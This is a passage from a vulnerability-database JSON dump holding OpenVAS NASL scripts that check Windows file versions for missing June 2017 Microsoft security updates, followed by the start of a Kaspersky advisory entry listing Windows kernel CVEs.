exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.9600.18722\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.9600.18722\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", 
"CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022727", "modified": "2020-06-04T00:00:00", "published": "2017-06-15T00:00:00", "id": "OPENVAS:1361412562310811196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811196", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022727)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022727)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 
implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811196\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\",\n \"CVE-2017-8547\", \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8492\", \"CVE-2017-8493\",\n \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\", \"CVE-2017-8524\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98897, 98898, 98885, 98853, 98903,\n 98953, 98863, 98819, 98920, 98918, 98854, 98845, 98820, 98914,\n 98856, 98857, 98821, 98824, 98922, 98923, 98862, 98858, 
98859,\n 98826, 98932, 98954, 98955, 98929, 98835, 98836, 98847, 98860,\n 98837, 98839, 98865, 98840, 98867, 98869, 98884, 98901, 98887,\n 98870, 98850, 98855, 98900, 98818, 98848, 98849, 98926, 98928,\n 98930, 98843, 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-15 16:09:05 +0530 (Thu, 15 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection (DIBSection) function.\n\n - Displays turn off unexpectedly even when 'Turn off display' is set to 'Never' in\n Power Options.\n\n - certutil.exe can no longer generate an export file (.epf) when attempting to\n recover a key for a version 1 certificate.\n\n - MSI files will no longer install when Device Guard is enabled.\n\n - A thin client becomes unusable and unresponsive when Unified Write Filter\n (UWF) with DISK mode is enabled causing NTFS errors with ID: 55 & ID: 130\n to be logged in the Event Logs.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. 
An attacker could then\n install programs. View, change, or delete data, or create new accounts with full\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for 32bit/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17442\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10240.0 - 11.0.10240.17442\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", 
"CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022714", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811164", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022714)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022714)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811164\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8527\",\n \"CVE-2017-0216\", \"CVE-2017-0218\", \"CVE-2017-0219\", \"CVE-2017-0282\",\n \"CVE-2017-8475\", \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\",\n \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\", \"CVE-2017-8548\",\n \"CVE-2017-8549\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8515\", \"CVE-2017-8517\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8518\");\n script_bugtraq_id(98878, 98852, 98902, 98933, 98896, 98897, 98898, 98885, 98853,\n 98903, 98854, 98953, 98863, 98819, 98920, 98918, 98845, 98856,\n 98820, 98821, 98914, 98922, 98857, 98862, 98824, 98923, 98929,\n 98858, 98859, 98826, 98932, 
98954, 98955, 98835, 98836, 98847,\n 98860, 98837, 98839, 98865, 98867, 98840, 98884, 98869, 98870,\n 98901, 98887, 98850, 98855, 98900, 98818, 98848, 98849, 98926,\n 98928, 98930, 98843, 98844, 98846, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:02:48 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022714)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022714\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists in,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - The certutil.exe can no longer generate an export file (.epf) when attempting\n to recover a key for a version 1 certificate.\n\n - Additional issues with updated time zone information, updates to the\n Access Point Name (APN) database and Internet Explorer. Security updates to\n Microsoft Scripting Engine, Microsoft Edge, Windows COM, Windows kernel, Windows\n kernel-mode drivers, Microsoft Uniscribe, Microsoft Graphics Component, Windows\n Shell, Microsoft Windows PDF and Internet Explorer. 
For more information about\n the security vulnerabilities resolved, please refer to the Security Update Guide.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n execute arbitrary code in the context of the current user, gain the same user\n rights as the current user, to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022714\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.961\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.961\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:45:28", "bulletinFamily": "scanner", "cvelist": 
["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022725", "modified": "2019-12-20T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811167", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022725)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022725)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811167\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-8474\", \"CVE-2017-8524\", \"CVE-2017-8527\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-0282\",\n \"CVE-2017-0283\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8531\",\n \"CVE-2017-8532\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8533\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8555\", \"CVE-2017-0292\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0296\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\",\n \"CVE-2017-8491\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8492\",\n \"CVE-2017-8493\", \"CVE-2017-8498\", \"CVE-2017-8499\", \"CVE-2017-8504\",\n \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8520\", \"CVE-2017-8521\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8464\", \"CVE-2017-8465\", \"CVE-2017-8515\", \"CVE-2017-8517\",\n \"CVE-2017-8554\", \"CVE-2017-8575\", \"CVE-2017-8518\");\n script_bugtraq_id(98902, 98930, 98933, 98853, 98903, 98953, 98863, 98885, 98920,\n 98854, 98845, 98819, 
98820, 98914, 98856, 98857, 98821, 98824,\n 98922, 98923, 98862, 98858, 98826, 98932, 98954, 98955, 98929,\n 98835, 98859, 98847, 98956, 98836, 98837, 98904, 98860, 98865,\n 98839, 98840, 98867, 98869, 98884, 98901, 98870, 98850, 98886,\n 98883, 98892, 98887, 98900, 98848, 98849, 98925, 98926, 98928,\n 98818, 98843, 98833, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:30:05 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The error with slow firewall operations that sometimes results in\n timeouts of Surface Hub's cleanup operation.\n\n - An issue with a race condition that prevents Cortana cross-device\n notification reply from working. Users will not be able to use the\n remote toast activation feature set.\n\n - An issue with the Privacy Separator feature of a Wireless Access Point\n does not block communication between wireless devices on local subnets.\n\n - Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n gain the same user rights as the current user and to take control of\n an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1703 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.412\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.412\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:59:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-0297", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-0299", "CVE-2017-8476", "CVE-2017-8484"], "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows kernel. 
Malicious users can exploit these vulnerabilities to obtain sensitive information and gain privileges.\n\n### *Affected products*:\nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2008 Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8478>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8479>) \n[CVE-2017-8474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8474>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8476>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8477>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0300>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8481>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8480>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8482>) \n[CVE-2017-8485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8485>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8484>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8489>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0299>) 
\n[CVE-2017-0297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0297>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8469>) \n[CVE-2017-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8468>) \n[CVE-2017-8465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8465>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8462>) \n[CVE-2017-8494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8494>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8490>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8491>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8479>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0299>) \n[CVE-2017-8485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8485>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8478>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8476>) \n[CVE-2017-8494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8494>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8480>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8489>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0300>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8491>) 
